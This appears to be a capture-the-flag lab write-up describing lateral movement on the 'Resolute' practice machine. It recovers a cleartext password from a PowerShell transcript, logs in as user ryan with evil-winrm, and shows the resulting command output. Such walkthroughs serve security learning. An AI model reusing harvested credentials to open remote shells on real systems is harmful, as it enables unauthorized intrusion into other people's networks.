InfoSec LAB

Resolute_Lateral_Movement

Created: 2 min read

WinRM

the ryan user appears to have attempted to administer the system with the powershell’s transcript enabled, which was logged to a hidden file. The transcript contains the CLEARTEXT credential for the user.

*evil-winrm* ps c:\PSTranscripts\20191203> net user ryan
User name                    ryan
Full Name                    Ryan Bertrand
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never
 
password last set            6/10/2023 12:34:02 PM
Password expires             Never
password changeable          6/11/2023 12:34:02 PM
Password required            Yes
User may change password     Yes
 
Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never
 
Logon hours allowed          All
 
Local Group Memberships
Global Group memberships     *Domain Users         *Contractors
The command completed successfully.

The ryan user is previously discovered has a transitive group membership to the Remote Desktop Users through the Contractors group.

Since Window’s doesn’t support Kerberos double-hop, I’d need to open up a new PS session using evil-winrm

┌──(kali㉿kali)-[~/archive/htb/labs/resolute]
└─$ evil-winrm -i resolute.megabank.local -u ryan -p 'Serv3r4Admin4cc123!'                         
 
Evil-WinRM shell v3.4
 
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
 
data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
info: Establishing connection to remote endpoint
 
*evil-winrm* ps c:\Users\ryan\Documents> whoami
megabank\ryan
*evil-winrm* ps c:\Users\ryan\Documents> hostname
Resolute
*evil-winrm* ps c:\Users\ryan\Documents> ipconfig
 
Windows IP Configuration
 
 
ethernet adapter ethernet0:
 
   connection-specific dns suffix  . :
   ipv4 address. . . . . . . . . . . : 10.10.10.169
   subnet mask . . . . . . . . . . . : 255.255.255.0
   default gateway . . . . . . . . . : 10.10.10.2
 
tunnel adapter isatap.{a20a4417-3dc7-47b7-8f00-87cc59d9f43f}:
 
   media state . . . . . . . . . . . : Media disconnected
   connection-specific dns suffix  . :

Lateral movement made to the ryan user

Interactive Graph View

Backlinks